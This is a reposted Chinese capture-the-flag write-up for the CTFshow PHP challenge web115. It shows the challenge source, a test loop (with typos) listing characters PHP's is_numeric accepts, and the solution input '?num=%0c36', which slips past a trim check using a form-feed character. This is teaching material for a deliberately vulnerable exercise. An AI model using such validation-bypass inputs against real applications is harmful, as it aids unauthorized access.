CTFshow php特性 web115
生活随笔
收集整理的這篇文章主要介紹了
CTFshow php特性 web115
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
目錄
- 源碼
- 思路
- 題解
- 總結
源碼
<?php/* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 15:08:19*/include('flag.php'); highlight_file(__FILE__); error_reporting(0); function filter($num){$num=str_replace("0x","1",$num);$num=str_replace("0","1",$num);$num=str_replace(".","1",$num);$num=str_replace("e","1",$num);$num=str_replace("+","1",$num);return $num; } $num=$_GET['num']; if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){if($num=='36'){echo $flag;}else{echo "hacker!!";} }else{echo "hacker!!!"; } hacker!!!思路
慢慢一層一層在本地嘗試
測試
php <?php //來自羽師傅 for (i=0; i <128 ; $i++) { x=chr(i).'1'; if(is_numeric($x)==true){ echo urlencode(chr($i))."\n"; } } // %09 %0A %0B %0C %0D + %2B - . 0 1 2 3 4 5 6 7 8 9
trim不過濾 %0c
題解
?num=%0c36
總結
水題
總結
以上是生活随笔為你收集整理的CTFshow php特性 web115的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: CTFshow php特性 web114
- 下一篇: CTFshow php特性 web123